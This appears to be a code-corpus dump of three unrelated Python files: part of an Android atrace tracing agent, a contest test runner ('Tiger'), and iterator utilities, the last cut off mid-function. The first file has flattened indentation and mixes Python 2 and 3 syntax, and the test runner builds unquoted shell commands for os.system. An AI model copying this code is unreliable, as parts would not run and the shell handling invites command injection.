        print ('Device SDK versions <= 17 not supported.\n'
               'Your device SDK version is %d.' % device_sdk_version)
        return False
    if device_sdk_version <= 22 and options.boot:
        print ('--boot option does not work on the device SDK '
               'version 22 or before.\nYour device SDK version '
               'is %d.' % device_sdk_version)
        return False
    return BootAgent() if options.boot else AtraceAgent()
def _construct_extra_atrace_args(options, categories):
"""Construct extra arguments (-a, -k, categories) for atrace command.
Args:
options: Tracing options.
categories: Categories of trace events to capture.
"""
extra_args = []
if options.app_name is not None:
extra_args.extend(['-a', options.app_name])
if options.kfuncs is not None:
extra_args.extend(['-k', options.kfuncs])
extra_args.extend(categories)
return extra_args
def _construct_atrace_args(options, categories):
"""Builds the command used to invoke a trace process.
Returns:
A tuple where the first element is an array of command arguments, and
the second element is a boolean which will be true if the command will
stream trace data.
"""
atrace_args = ATRACE_BASE_ARGS[:]
if options.compress_trace_data:
atrace_args.extend(['-z'])
if (options.trace_time is not None) and (options.trace_time > 0):
atrace_args.extend(['-t', str(options.trace_time)])
if (options.trace_buf_size is not None) and (options.trace_buf_size > 0):
atrace_args.extend(['-b', str(options.trace_buf_size)])
elif 'sched' in categories:
# 'sched' is a high-volume tag, double the default buffer size
# to accommodate that
atrace_args.extend(['-b', '4096'])
extra_args = _construct_extra_atrace_args(options, categories)
atrace_args.extend(extra_args)
return atrace_args
class AtraceAgent(tracing_agents.TracingAgent):
def __init__(self):
super(AtraceAgent, self).__init__()
self._adb = None
self._trace_data = None
self._tracer_args = None
self._collection_thread = None
self._device_utils = None
self._device_serial_number = None
self._options = None
self._categories = None
@py_utils.Timeout(tracing_agents.START_STOP_TIMEOUT)
def StartAgentTracing(self, options, categories, timeout=None):
self._options = options
self._categories = categories
if not self._categories:
self._categories = DEFAULT_CATEGORIES
avail_cats = get_available_categories(options)
unavailable = [x for x in self._categories if x not in avail_cats]
self._categories = [x for x in self._categories if x in avail_cats]
if unavailable:
print 'These categories are unavailable: ' + ' '.join(unavailable)
self._device_utils = device_utils.DeviceUtils(options.device_serial_number)
self._device_serial_number = options.device_serial_number
self._tracer_args = _construct_atrace_args(options, self._categories)
self._device_utils.RunShellCommand(self._tracer_args + ['--async_start'])
return True
def _collect_and_preprocess(self):
"""Collects and preprocesses trace data.
Stores results in self._trace_data.
"""
trace_data = self._collect_trace_data()
self._trace_data = self._preprocess_trace_data(trace_data)
@py_utils.Timeout(tracing_agents.START_STOP_TIMEOUT)
def StopAgentTracing(self, timeout=None):
"""Stops tracing and starts collecting results.
To synchronously retrieve the results after calling this function,
call GetResults().
"""
self._collection_thread = threading.Thread(
target=self._collect_and_preprocess)
self._collection_thread.start()
return True
@py_utils.Timeout(tracing_agents.GET_RESULTS_TIMEOUT)
def GetResults(self, timeout=None):
"""Waits for collection thread to finish and returns trace results."""
self._collection_thread.join()
self._collection_thread = None
return tracing_agents.TraceResult('systemTraceEvents', self._trace_data)
def SupportsExplicitClockSync(self):
return True
def RecordClockSyncMarker(self, sync_id, did_record_sync_marker_callback):
"""Records a clock sync marker.
Args:
sync_id: ID string for clock sync marker.
"""
cmd = 'echo name=%s > /sys/kernel/debug/tracing/trace_marker' % sync_id
with self._device_utils.adb.PersistentShell(
self._device_serial_number) as shell:
t1 = trace_time.Now()
shell.RunCommand(cmd, close=True)
did_record_sync_marker_callback(t1, sync_id)
def _dump_trace(self):
"""Dumps the atrace buffer and returns the dumped buffer."""
dump_cmd = self._tracer_args + ['--async_dump']
return self._device_utils.RunShellCommand(dump_cmd, raw_output=True)
def _stop_trace(self):
    """Stops atrace.

    Tries to stop atrace asynchronously. On some devices --async_stop does
    not actually stop tracing, so as a fallback this runs a zero-length
    synchronous trace, which forces tracing off.
    """
    self._device_utils.RunShellCommand(self._tracer_args + ['--async_stop'])
    # Ask the kernel whether tracing really stopped.
    still_on = int(self._device_utils.RunShellCommand(
        ['cat', '/sys/kernel/debug/tracing/tracing_on'])[0])
    if still_on:
        self._device_utils.RunShellCommand(self._tracer_args + ['-t 0'])
def _collect_trace_data(self):
    """Reads the output from atrace and stops the trace."""
    dump = self._dump_trace()
    start_match = re.search(TRACE_START_REGEXP, dump)
    if not start_match:
        raise IOError('Unable to get atrace data. Did you forget adb root?')
    # Everything before the start marker is adb noise; strip it, then drop
    # any remaining adb artifacts from the payload.
    payload = re.sub(ADB_IGNORE_REGEXP, '', dump[start_match.end(0):])
    self._stop_trace()
    return payload
def _preprocess_trace_data(self, trace_data):
    """Performs various processing on atrace data.

    Decompresses the raw capture and, depending on self._options, patches
    thread names, missing TGIDs and circular-buffer artifacts. Exits the
    process when the capture turns out to be empty.

    Args:
      trace_data: The raw trace data.
    Returns:
      The processed trace data.
    """
    if trace_data:
        trace_data = strip_and_decompress_trace(trace_data)
    if not trace_data:
        # BUG FIX: "print >> sys.stderr" is Python-2-only syntax; write to
        # stderr portably instead.
        sys.stderr.write('No data was captured. Output file was not '
                         'written.\n')
        sys.exit(1)
    if self._options.fix_threads:
        # Issue ps command to device and patch thread names.
        ps_dump = do_preprocess_adb_cmd('ps -t',
                                        self._options.device_serial_number)
        if ps_dump is not None:
            thread_names = extract_thread_list(ps_dump)
            trace_data = fix_thread_names(trace_data, thread_names)
    if self._options.fix_tgids:
        # Issue printf command to device and patch tgids.
        procfs_dump = do_preprocess_adb_cmd('printf "%s\n" ' +
                                            '/proc/[0-9]*/task/[0-9]*',
                                            self._options.device_serial_number)
        if procfs_dump is not None:
            pid2_tgid = extract_tgids(procfs_dump)
            trace_data = fix_missing_tgids(trace_data, pid2_tgid)
    if self._options.fix_circular:
        trace_data = fix_circular_traces(trace_data)
    return trace_data
class BootAgent(AtraceAgent):
    """AtraceAgent that specializes in tracing the boot sequence."""

    def __init__(self):
        super(BootAgent, self).__init__()

    @py_utils.Timeout(tracing_agents.START_STOP_TIMEOUT)
    def StartAgentTracing(self, options, categories, timeout=None):
        """Arms boot tracing on the device (which reboots it).

        Args:
          options: The command-line options object.
          categories: The atrace categories to enable for the boot trace.
          timeout: Consumed by the py_utils.Timeout decorator; unused here.
        """
        self._options = options
        # BUG FIX: build the command outside the try block -- if it is built
        # inside and raises, the except handler would reference an unbound
        # setup_args.
        setup_args = _construct_boot_setup_command(options, categories)
        try:
            subprocess.check_call(setup_args)
        except OSError as error:
            # BUG FIX: "print >> sys.stderr" is Python-2-only syntax; write
            # to stderr portably instead.
            sys.stderr.write(
                'The command "%s" failed with the following error:\n' %
                ' '.join(setup_args))
            sys.stderr.write('  %s\n' % error)
            sys.exit(1)

    def _dump_trace(self):  # called by StopAgentTracing
        """Dumps the running trace asynchronously and returns the dumped trace."""
        dump_cmd = _construct_boot_trace_command(self._options)
        return self._device_utils.RunShellCommand(dump_cmd, raw_output=True)

    def _stop_trace(self):  # called by _collect_trace_data via StopAgentTracing
        # pylint: disable=no-self-use
        # This is a member function for consistency with AtraceAgent.
        pass  # Don't need to stop separately; already done in _dump_trace.
def _construct_boot_setup_command(options, categories):
    """Builds the adb shell command that arms boot tracing and reboots."""
    shell_cmd = (['echo'] + categories + ['>', BOOTTRACE_CATEGORIES] +
                 ['&&'] +
                 ['setprop', BOOTTRACE_PROP, '1'] +
                 ['&&'] +
                 ['reboot'])
    return util.construct_adb_shell_command(shell_cmd,
                                            options.device_serial_number)
def _construct_boot_trace_command(options):
    """Builds the adb shell command that dumps and disarms a boot trace."""
    shell_cmd = (['atrace', '--async_stop'] +
                 ['&&'] +
                 ['setprop', BOOTTRACE_PROP, '0'] +
                 ['&&'] +
                 ['rm', BOOTTRACE_CATEGORIES])
    return util.construct_adb_shell_command(shell_cmd,
                                            options.device_serial_number)
def extract_thread_list(trace_text):
    """Parses a 'ps -t' dump into a thread-id -> thread-name mapping.

    Args:
      trace_text: The text portion of the trace (a ps dump).
    Returns:
      A map of thread ids (int) to thread names.
    """
    threads = {}
    # Skip the header row of the ps dump.
    for row in trace_text.splitlines()[1:]:
        fields = row.split(None, 8)
        if len(fields) != 9:
            continue
        threads[int(fields[1])] = fields[8]
    return threads
def extract_tgids(trace_text):
    """Parses a procfs task listing into a task-id -> tgid mapping.

    Args:
      trace_text: Text containing lines of the form /proc/<tgid>/task/<tid>.
    Returns:
      A map of task (thread) ids to their owning tgid, both as strings.
    """
    task_to_tgid = {}
    pattern = re.compile(r'^/proc/([0-9]+)/task/([0-9]+)')
    for line in trace_text.splitlines():
        match = pattern.match(line)
        if match:
            tgid, tid = match.group(1), match.group(2)
            task_to_tgid[tid] = tgid
    return task_to_tgid
def strip_and_decompress_trace(trace_data):
    """Fixes new-lines and decompresses trace data.

    Args:
      trace_data: The trace data returned by atrace.
    Returns:
      The decompressed trace data.
    """
    # adb shell turns '\n' into '\r\n' -- and on Windows into '\r\r\n';
    # collapse both forms back into plain newlines. The two prefixes are
    # mutually exclusive, so the order of the checks does not matter.
    if trace_data.startswith('\r\r\n'):
        trace_data = trace_data.replace('\r\r\n', '\n')
    elif trace_data.startswith('\r\n'):
        trace_data = trace_data.replace('\r\n', '\n')
    # Skip the initial newline.
    if trace_data[0] == '\n':
        trace_data = trace_data[1:]
    if not trace_data.startswith(TRACE_TEXT_HEADER):
        # No header found, so assume the data is compressed.
        trace_data = zlib.decompress(trace_data)
    # Enforce Unix line-endings, then drop any leading blank lines.
    trace_data = trace_data.replace('\r', '')
    return trace_data.lstrip('\n')
def fix_thread_names(trace_data, thread_names):
    """Replaces thread ids with their names.

    Args:
      trace_data: The atrace data.
      thread_names: A mapping of thread ids to thread names; unknown ids
        discovered in the trace are added to it as a side effect.
    Returns:
      The updated trace data.
    """
    def replace_match(match):
        # Groups: (1) thread name as it appears in the trace, (2) tid.
        tid = int(match.group(2))
        if tid <= 0:
            return match.group(0)
        name = thread_names.get(tid)
        if name is None:
            name = match.group(1)
            if name == '<...>':
                name = '<' + str(tid) + '>'
            thread_names[tid] = name
        return name + '-' + match.group(2)

    # Matches lines such as:
    #   Binder_2-895, or com.google.android.inputmethod.latin-1078 etc...
    return re.sub(r'^\s*(\S+)-(\d+)', replace_match, trace_data,
                  flags=re.MULTILINE)
def fix_missing_tgids(trace_data, pid2_tgid):
    """Replaces missing TGIDs in the trace data with those found in procfs.

    Args:
      trace_data: The atrace data.
      pid2_tgid: A mapping of pid (string) to tgid (string) from procfs.
    Returns:
      The updated trace data with missing TGIDs replaced with the correct TGID.
    """
    def replace_match(match):
        proc_name, pid, tgid_field = match.group(1, 2, 3)
        is_missing = (int(pid) > 0 and proc_name != '<idle>'
                      and tgid_field == '(-----)' and pid in pid2_tgid)
        if not is_missing:
            return match.group(0)
        # Produces Proc_name-PID ( TGID), e.g.:
        #   Binder_2-381 (-----) becomes Binder_2-381 ( 128)
        return proc_name + '-' + pid + ' ( ' + pid2_tgid[pid] + ')'

    # Matches lines such as:  Binder_2-895 (-----)
    return re.sub(r'^\s*(\S+)-(\d+)\s+(\(\S+\))', replace_match, trace_data,
                  flags=re.MULTILINE)
def fix_circular_traces(out):
    """Fixes inconsistencies in traces due to circular buffering.

    The circular buffers are kept per CPU, so it is not guaranteed that the
    beginning of a slice is overwritten before the end. To work around this,
    throw away the prefix of the trace where not all CPUs have events yet.

    Args:
      out: The data to fix.
    Returns:
      The updated trace data.
    """
    # When a CPU's buffer has overflowed and older events were dropped, the
    # kernel emits a marker of the form '##### CPU 2 buffer started ####'
    # on the line before the first surviving event on that CPU. No such
    # markers appear if nothing overflowed or the trace used non-circular
    # buffers.
    marker_re = re.compile(r'^#+ CPU \d+ buffer started', re.MULTILINE)
    start_of_full_trace = 0
    match = marker_re.search(out, start_of_full_trace + 1)
    while match:
        # Keep advancing to the *last* marker: only after it do all CPUs
        # have events.
        start_of_full_trace = match.start()
        match = marker_re.search(out, start_of_full_trace + 1)
    if start_of_full_trace > 0:
        # Need to keep the '#' comment header intact to make the importer
        # happy; splice the trimmed event stream directly after it.
        end_of_header = re.search(r'^[^#]', out, re.MULTILINE).start()
        out = out[:end_of_header] + out[start_of_full_trace:]
    return out
def do_preprocess_adb_cmd(command, serial):
    """Runs an ADB command used for preprocessing of trace output.

    Args:
      command: Command to run.
      serial: Serial number of device.
    Returns:
      The command output joined into a single string, or None when the
      command exits with a non-zero status.
    """
    dump, ret_code = util.run_adb_shell([command], serial)
    if ret_code != 0:
        return None
    return ''.join(dump)
|
simpleattt.py | #!/usr/bin/env python3
import subprocess
import os.path
import sys
import fnmatch
import filecmp
import argparse
import textwrap
import signal
import tigergui
from multiprocessing import Pool
from multiprocessing import Process
class bcolors :
    """ANSI escape sequences used to colorize terminal output."""
    INFO = '\033[95m'      # magenta: headline information
    INFO_LOW = '\033[94m'  # blue: secondary info (file names, paths)
    SUCCES = '\033[92m'    # green: passing tests
    WARNING = '\033[93m'   # yellow: non-fatal problems
    FAIL = '\033[91m'      # red: failures
    ENDC = '\033[0m'       # reset attributes back to the terminal default
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,description=textwrap.dedent(
"Tiger is a command-line tool for input-output tasks.\nOn default it reads the tests from the disk\n\n"
" ___......----:'"":--....(\ \n"
" .-':'\"\": : : : : : :.(1\.`-. \n"
" .'`. `. : : : : : : : : : : .'; \n"
" :-`. : . : : `. : : :. : :`.`. a; \n"
" : ;-. `-.-._. : : : ::. .' `. `., = ; \n"
" :-:.` .-. _-., : : : ::,.'.-' ;-. ,'''\" \n"
" .'.' ;`. .-' `-.: : : : :;.-'.-.' `-' \n"
" :. .'.'.-' .'`-.' -._;..:---'''''._.-/ \n"
" :`--'.' : :' ;`-.; :.`.-'`. \n"
" `''' : : ;`.; :=; `.-'`. \n"
" : '. : ; :-: `._-`. \n"
" `'\"' `. `. `--' '._' \n"
" `'\"' \n"
))
parser.add_argument(
"ShortTaskName",
help="Short Task Name (for example : swo for task Swords) "
"Default setting require : (for Swords) "
"Tests in form swoX.in and swoX.out, binary code in swo or source in swo.cpp"
)
parser.add_argument(
"-gui",
"-graphicaluserinterface",
action="store_true",
help="Open graphical user interface. If this option is used all other options are ignored."
)
binarySourceGroup = parser.add_mutually_exclusive_group() # grupa do binary i sourcecode
binarySourceGroup.add_argument(
"-b",
"--binarycode",
help="Exceptional binary code to run against the common one",
default=""
)
binarySourceGroup.add_argument(
"-s",
"--sourcecode",
help="Exceptional source code to compile and run against the common one",
default=""
)
generateGroup = parser.add_mutually_exclusive_group()
generateGroup.add_argument(
"-g",
"--generate",
action="store_true",
help="Generate and run tests but save only those on which the program failed."
)
generateGroup.add_argument(
"-gs",
"--generateandsave",
action="store_true",
help="Generate, run tests and save all tests."
)
generateGroup.add_argument(
"-tf",
"--testfolder",
help="Change the folder with tests which will be executed",
default=""
)
parser.add_argument(
"-op",
"--otherprefix",
help="Change the default prefix for tests",
default=""
)
checkerGroup = parser.add_mutually_exclusive_group()
checkerGroup.add_argument(
"-c",
"--checker",
help="For tasks, which have several acceptable answers (checker gets the input and the output - joined in one file) "
"This chcecker needs to get the input from stdin and return OK or WA to stdout",
default=""
)
checkerGroup.add_argument(
"-cb",
"--checkerbruteforce",
help="For tasks, which have several acceptable answers (checker gets the input, bruteforceprogram output, the output - joined in one file)\n"
"This chcecker needs to get the input from stdin and return OK or WA to stdout",
default=""
)
parser.add_argument(
"-mt",
"--maxtime",
help="Change the time after the program will be killed",
default="5"
)
args = parser.parse_args()
# GUI mode short-circuits everything else on the command line.
if(args.gui) :
    tigergui.buildGui()
    sys.exit()
# Short task name, e.g. "swo": tests are swoX.in/swoX.out, binary ./swo.
STN = args.ShortTaskName
checker = ""
#def wykonaj(program,test,maxtime) :
#    if __name__ == '__main__' :
#        p = Process(target=wykonaj, args=(program,test,maxtime,))
#        p.start()
#        p.join()
# PID of the current process; referenced by shell() for bookkeeping.
PID=0
def handler(signum, frame):
    """SIGALRM handler: terminates this process and its parent.

    Fired when the child launched by shell() exceeds its time limit.

    Args:
        signum: The delivered signal number (SIGALRM).
        frame: Current stack frame (unused).
    """
    #print (bcolors.FAIL + "TimeLimitExceeded - Aborting" + bcolors.ENDC)
    #print ("Zabijam ", os.getppid(), " i ", os.getpid())
    print(bcolors.INFO + "Za chwilę zabiję te procesy, pamiętaj o zabiciu jeszcze wykonywanego programu." + bcolors.ENDC)
    # BUG FIX: send the signals directly instead of shelling out to `kill`;
    # os.kill avoids spawning a shell (same default SIGTERM semantics).
    os.kill(os.getpid(), signal.SIGTERM)
    os.kill(os.getppid(), signal.SIGTERM)
def shell(string,maxextime) :
    """Runs a shell command in a child process with a wall-clock time limit.

    Arms SIGALRM for `maxextime` seconds; if the command is still running
    when the alarm fires, handler() kills this process tree.

    Args:
        string: The shell command line, executed via os.system.
        maxextime: Time limit in seconds (converted with int()).
    """
    # NOTE(review): guarded by __name__ so nothing executes when this module
    # is imported (e.g. on multiprocessing 'spawn' re-import); when imported,
    # the call silently becomes a no-op -- confirm this is intended.
    if __name__ == '__main__' :
        signal.signal(signal.SIGALRM, handler)
        p = Process(target=os.system, args=(string,))
        PID = os.getpid()
        #print(PID)
        #asystem(string)
        signal.alarm(int(maxextime))
        p.start()
        p.join()
        #print("procesid = ", p.pid)
        # Disarm the alarm once the child finished within its budget.
        signal.alarm(0)
def wykonaj(program, test, maxtime):  # statuses: WA, OK, RE
    """Runs `program` on one test and judges the result.

    Compares the program's stdout against the expected .out file, or defers
    to a checker program when one was supplied on the command line.

    Args:
        program: Path of the binary to run (without the leading ./).
        test: Path of the .in test file.
        maxtime: Time limit in seconds passed through to shell().

    Returns:
        'OK', 'WA' or 'RE' (or the checker's stripped verdict line).
    """
    if os.path.isfile(".temporary"):
        os.remove(".temporary")
    if os.path.isfile(".temporary2"):
        os.remove(".temporary2")
    out = test[:-2] + "out"
    if os.path.isfile(out) == False:
        print((bcolors.WARNING + "{0:20} " + ": RE - Can't find the out file" + bcolors.ENDC).format(test))
        return "RE"
    shell("./" + program + " < " + test + " > " + ".temporary", maxtime)
    if os.path.isfile(".temporary") == False:
        print(bcolors.FAIL + "Your program ended, but didn't return the answer for : " + test + bcolors.ENDC)
        return "RE"
    if args.checker != "":
        # BUG FIX: "cat" was concatenated directly with the file name
        # (producing e.g. "cattest.in"); add the missing space. Also run
        # args.checker -- the module-level `checker` is never assigned.
        shell("cat " + test + " > .temporary2; echo >> .temporary2; cat .temporary >> .temporary2", maxtime)
        shell("./" + args.checker + " < .temporary2 > .temporary3", maxtime)
        with open('.temporary3', 'r') as f:
            # BUG FIX: strip the trailing newline so the verdict compares
            # equal to "OK"/"WA" at the call sites.
            return f.readline().strip()
    elif args.checkerbruteforce != "":
        # BUG FIX: missing space after "cat"; the second cat must append
        # (">>") instead of overwriting the freshly written input; and the
        # checker binary is args.checkerbruteforce, not `checker`.
        shell("cat " + test + " > .temporary2; echo >> .temporary2;", maxtime)
        shell("cat " + out + " >> .temporary2; echo >> .temporary2;", maxtime)
        shell("cat .temporary >> .temporary2", maxtime)
        shell("./" + args.checkerbruteforce + " < .temporary2 > .temporary3", maxtime)
        with open('.temporary3', 'r') as f:
            return f.readline().strip()
    elif filecmp.cmp(out, ".temporary"):
        print((bcolors.SUCCES + "{0:20} " + ": OK" + bcolors.ENDC).format(test))
        return "OK"
    else:
        print((bcolors.FAIL + "{0:20} " + ": WA" + bcolors.ENDC).format(test))
        return "WA"
sourceCodeName = ""
binaryCodeName = ""
# Resolve the binary under test: -b overrides the default ./<STN>.
if args.binarycode != "":
    binaryCodeName = args.binarycode
else:
    binaryCodeName = STN
if os.path.isfile(binaryCodeName):
    print(bcolors.INFO + "Succesfully read the binary file : " + bcolors.INFO_LOW + binaryCodeName + bcolors.ENDC)
else:
    print(bcolors.WARNING + "Couldn't find the binary file : " + bcolors.INFO_LOW + binaryCodeName + bcolors.ENDC)
    # No binary: fall back to compiling from source (-s overrides <STN>.cpp).
    if args.sourcecode != "":
        sourceCodeName = args.sourcecode
    else:
        sourceCodeName = STN + ".cpp"
    if os.path.exists(sourceCodeName):
        print(bcolors.INFO + "Succsesfully read the source file : " + bcolors.INFO_LOW + sourceCodeName + bcolors.ENDC)
    else:
        print(bcolors.FAIL + "Couldn't find the source file: " + bcolors.INFO_LOW + sourceCodeName + ", ani nie podano innego " + bcolors.ENDC)
        sys.exit()
    print(bcolors.INFO + "So let's try to compile your program (C++) : " + bcolors.INFO_LOW + sourceCodeName + bcolors.ENDC)
    # BUG FIX: shell() takes a mandatory time limit; the original call
    # omitted it and raised TypeError. Give the compiler a generous budget.
    shell("g++" + " -o " + STN + " " + sourceCodeName + " -O2" + " -Wall" + " -static" + " -std=c++11" + " -g", 60)
    binaryCodeName = STN
    if os.path.exists(binaryCodeName):
        print(bcolors.SUCCES + "Compiled succsesfully." + bcolors.ENDC)
    else:
        print(bcolors.FAIL + "There were some errors during the compilation process." + bcolors.ENDC)
        sys.exit()
#print(bcolors.INFO + "Czy chcesz generować testy generatorem(0), czy sprawdzić testy już zapisane na dysku(1) ? (0/1) " + bcolors.ENDC)
#tryb = input()
if (args.generate or args.generateandsave):
    print(bcolors.WARNING + "Ta opcja jescze w pełni nie działa." + bcolors.ENDC)
    # BUG FIX: the original referenced an undefined `nazwa_programu`
    # (NameError at runtime); the task's short name STN is the intended
    # program/prefix throughout this branch.
    generator = STN + "gen"
    zrodlo = STN + "zrodlo"
    brut = STN + "brut"
    nr = 1
    wa = 0
    ac = 0
    while True:
        shell("cp " + zrodlo + " zrodlo2", 10)  # poprawić
        shell("echo " + str(nr) + " >> " + "zrodlo2", 10)
        test = STN + str(nr) + ".in"
        # BUG FIX: the expected-output file must end in ".out"; the original
        # used ".in" again and overwrote the freshly generated input.
        testout = STN + str(nr) + ".out"
        shell("./" + generator + " < zrodlo2 " + " > " + test, 10)
        shell("./" + brut + " < " + test + " > " + testout, 10)
        wynik = wykonaj(STN, test, args.maxtime)
        if wynik == "OK":
            ac += 1
        if wynik == "WA":
            wa += 1
        print("ac:", ac, " wa:", wa, " nr:", nr)
        nr += 1
else:
    print(bcolors.INFO + "Reading tests from the disk." + bcolors.ENDC)
    ile_testow = 0
    testy_z_wa = []
    testy_z_re = []
    katalog = "."
    if args.testfolder != "":
        katalog = args.testfolder
    #print("katalog=" + katalog);
    if not os.path.isdir(katalog):
        print(bcolors.FAIL + "Folder " + katalog + " doesn't exist" + bcolors.ENDC)
        sys.exit()
    prefix = STN
    if args.otherprefix != "":
        prefix = args.otherprefix
    for test in os.listdir(katalog):
        if fnmatch.fnmatch(test, prefix + '*.in'):
            wynik = wykonaj(binaryCodeName, katalog + "/" + test, args.maxtime)
            if wynik == "WA":
                testy_z_wa.append(test)
            elif wynik == "RE":
                testy_z_re.append(test)
            ile_testow += 1
    ile_z_ok = ile_testow - len(testy_z_wa) - len(testy_z_re)
    print()
    if ile_testow > 0:
        print(bcolors.INFO + "Udało się zrobić ", ile_z_ok, "/", ile_testow, " ~ ", ile_z_ok * 100 // ile_testow, "%", bcolors.ENDC)
    if len(testy_z_wa) > 0:
        # BUG FIX: close the color code so the list below doesn't bleed red.
        print(bcolors.FAIL + "WA na testach : " + bcolors.ENDC)
        print(testy_z_wa)
    if len(testy_z_re) > 0:
        print(bcolors.WARNING + "RE na testach : " + bcolors.ENDC)
        print(testy_z_re)
print(bcolors.INFO + "Ending..." + bcolors.ENDC)
# Clean up scratch files left behind by wykonaj().
for tmp_file in (".temporary", ".temporary2", ".temporary3"):
    if os.path.isfile(tmp_file):
        os.remove(tmp_file)
|
iterators.py | import multiprocessing
import random
import sys
import queue
import threading
import traceback
from typing import Any, TypeVar, Iterable, Iterator, List, Callable, Optional, Union, Tuple
T = TypeVar('T')
__all__ = ['ThreadedIterator', 'MultiWorkerCallableIterator', 'BufferedIterator', 'DoubleBufferedIterator', 'shuffled_iterator']
class ThreadedIterator(Iterator[T]):
    """An iterator whose elements are produced by a single background thread.

    The wrapped iterator must *not* yield None -- None is used internally as
    the end-of-stream sentinel. Stream order is preserved.
    """

    def __init__(self, original_iterator: Iterator[T], max_queue_size: int = 2, enabled: bool = True):
        self.__is_enabled = enabled
        if not enabled:
            self.__original_iterator = original_iterator
            return
        # Bounded queue gives backpressure on the producer thread.
        self.__queue = queue.Queue(maxsize=max_queue_size)  # type: queue.Queue[Optional[T]]
        self.__thread = threading.Thread(target=lambda: self.__worker(self.__queue, original_iterator))
        self.__thread.start()

    @staticmethod
    def __worker(out_queue: queue.Queue, source: Iterator[T]) -> None:
        """Producer loop: forwards elements, then the None sentinel."""
        try:
            for item in source:
                assert item is not None, 'By convention, Iterables wrapped in ThreadedIterator may not contain None.'
                out_queue.put(item, block=True)
            out_queue.put(None, block=True)
        except Exception as exc:  # pylint: disable=broad-except
            # Ship the exception (with its traceback) to the consumer thread.
            _, __, tb = sys.exc_info()
            out_queue.put((exc, tb), block=True)

    def __next__(self) -> T:
        item = self.__queue.get(block=True)
        if item is None:
            self.__thread.join()
            # Remember exhaustion in case __next__ is called once more.
            self.__queue.put(None)
            raise StopIteration
        if isinstance(item, tuple) and isinstance(item[0], Exception):
            raise item[0].with_traceback(item[1])
        return item

    def __iter__(self):
        return self if self.__is_enabled else self.__original_iterator
class MultiWorkerCallableIterator(Iterable):
    """Computes its elements with a pool of parallel workers.

    Each element of `argument_iterator` is an argument tuple for
    `worker_callable`; results are yielded in arbitrary completion order.
    The iterator should have at least one element.
    """

    def __init__(self, argument_iterator: Iterator[Iterable], worker_callable: Callable, max_queue_size: int=1, num_workers: int = 5, use_threads: bool=True):
        self.__in_queue = queue.Queue() if use_threads else multiprocessing.Queue()  # type: Union[queue.Queue, multiprocessing.Queue]
        self.__num_elements = 0
        # Preload all work items so workers can drain the queue freely.
        for argument_tuple in argument_iterator:
            self.__in_queue.put(argument_tuple)
            self.__num_elements += 1
        if use_threads:
            self.__out_queue = queue.Queue(maxsize=max_queue_size)  # type: Union[queue.Queue, multiprocessing.Queue]
            self.__threads = [threading.Thread(target=lambda: self.__worker(worker_callable))
                              for _ in range(num_workers)]  # type: List[Union[threading.Thread, multiprocessing.Process]]
        else:
            self.__out_queue = multiprocessing.Queue(maxsize=max_queue_size)
            self.__threads = [multiprocessing.Process(target=lambda: self.__worker(worker_callable))
                              for _ in range(num_workers)]
        for worker in self.__threads:
            worker.start()

    def __worker(self, worker_callable):
        """Worker loop: drain the input queue, pushing results to the output."""
        try:
            while not self.__in_queue.empty():
                arguments = self.__in_queue.get(block=False)
                self.__out_queue.put(worker_callable(*arguments))
        except queue.Empty:
            # Another worker raced us to the last element; we're done.
            pass
        except Exception as exc:  # pylint: disable=broad-except
            _, __, tb = sys.exc_info()
            self.__out_queue.put((exc, tb), block=True)

    def __iter__(self):
        for _ in range(self.__num_elements):
            result = self.__out_queue.get(block=True)
            if isinstance(result, tuple) and isinstance(result[0], Exception):
                raise result[0].with_traceback(result[1])
            yield result
        for worker in self.__threads:
            worker.join()
class BufferedIterator(Iterable[T]):
    """An iterator object that computes its elements in a parallel process,
    ready to be consumed.

    The wrapped iterator must *not* yield None -- None is used internally
    as the end-of-stream sentinel.

    NOTE(review): the worker is a multiprocessing.Process with a lambda
    target; that only pickles under the 'fork' start method (Linux) --
    confirm the intended platforms.
    """
    def __init__(self, original_iterator: Iterator[T], max_queue_size: int=3, enabled: bool=True):
        self.__original_iterator = original_iterator
        self.__is_enabled = enabled
        if enabled:
            # Bounded queue provides backpressure on the producer process.
            self.__buffer = multiprocessing.Queue(maxsize=max_queue_size) # type: multiprocessing.Queue[Union[None, T, Tuple[Exception, Any]]]
            self.__worker_process = multiprocessing.Process(target=lambda: self.__worker(original_iterator))
            self.__worker_process.start()

    def __worker(self, original_iterator: Iterator[T]) -> None:
        """Implementation of worker thread. Iterates over the original iterator, pulling results
        and putting them into a buffer."""
        try:
            for element in original_iterator:
                assert element is not None, 'By convention, iterator elements must not be None'
                self.__buffer.put(element, block=True)
            # None marks normal end-of-stream for the consumer.
            self.__buffer.put(None, block=True)
        except Exception as e:
            # Forward the exception (plus traceback) so the consumer re-raises it.
            _, __, tb = sys.exc_info()
            self.__buffer.put((e, tb), block=True)

    def __iter__(self):
        if not self.__is_enabled:
            yield from self.__original_iterator
            return
        next_element = self.__buffer.get(block=True)
        while next_element is not None:
            if isinstance(next_element, tuple) and isinstance(next_element[0], Exception):
                raise next_element[0].with_traceback(next_element[1])
            yield next_element
            next_element = self.__buffer.get(block=True)
        self.__worker_process.join()
class DoubleBufferedIterator(Iterator[T]):
    """An iterator object that wraps double buffering around an iterable sequence.

    This avoids waits in downstream applications if each step of the inner
    iterable can take a long while, as the Queue used in
    (Single)BufferedIterator requires consumer and producer to synchronize.

    Note: The inner iterable should *not* return None (None is the
    end-of-stream sentinel).

    NOTE(review): both workers are multiprocessing.Process objects with
    lambda targets, which requires the 'fork' start method -- confirm the
    intended platforms.
    """
    def __init__(self, original_iterable: Iterable[T], max_queue_size_inner: int=20, max_queue_size_outer: int=5):
        # Two stages: the inner queue is filled from the original iterable;
        # the outer queue decouples the consumer from the (slow) producer.
        self.__buffer_inner = multiprocessing.Queue(maxsize=max_queue_size_inner) # type: multiprocessing.Queue[Union[None, T, Tuple[Exception, Any]]]
        self.__buffer_outer = multiprocessing.Queue(maxsize=max_queue_size_outer) # type: multiprocessing.Queue[Union[None, T, Tuple[Exception, Any]]]
        self.__worker_process_inner = multiprocessing.Process(target=lambda: self.__worker_inner(original_iterable))
        self.__worker_process_outer = multiprocessing.Process(target=lambda: self.__worker_outer())
        self.__worker_process_inner.start()
        self.__worker_process_outer.start()

    def __worker_inner(self, original_iterator: Iterable[T]) -> None:
        """Consumes elements from the original iterator, putting them into an inner buffer."""
        try:
            for element in original_iterator:
                assert element is not None, 'By convention, iterator elements must not be None'
                self.__buffer_inner.put(element, block=True)
            # None marks normal end-of-stream.
            self.__buffer_inner.put(None, block=True)
        except Exception as e:
            _, __, tb = sys.exc_info()
